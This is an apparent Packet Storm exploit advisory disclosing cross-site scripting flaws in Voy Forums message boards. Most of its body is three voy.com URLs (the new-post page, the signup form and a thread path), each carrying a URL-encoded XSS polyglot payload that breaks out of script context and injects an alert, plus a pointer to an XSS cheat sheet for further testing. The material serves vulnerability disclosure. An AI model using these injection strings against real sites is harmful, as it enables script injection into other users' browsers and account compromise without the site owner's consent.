Voy Forums suffers from a cross site scripting vulnerability.
4a5718e5082bc88856784acdd5ef7dbd74a6440c022b6b9406f0c25625a7505f# Exploit Title: Voy Forums Cross Site Scripting
# Date: 29.01.2012
# Author: Sony
# Software Link: http://www.voy.com
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/01/voy-forums-cross-site-scripting.html
..................................................................
Interesting, it's very old message boards.
http://www.voyager.com/
http://voy.com/47252/
in the search..
http://voy.com/47252/search.html
You can made test with xss code:
http://ha.ckers.org/xss.html
in the newpost:
http://voy.com/47252/newpost.html%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
in the signup form:
http://voy.com/cgi/signup.form?flag=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
and here:
http://voy.com/35529/2/%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
etc..
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed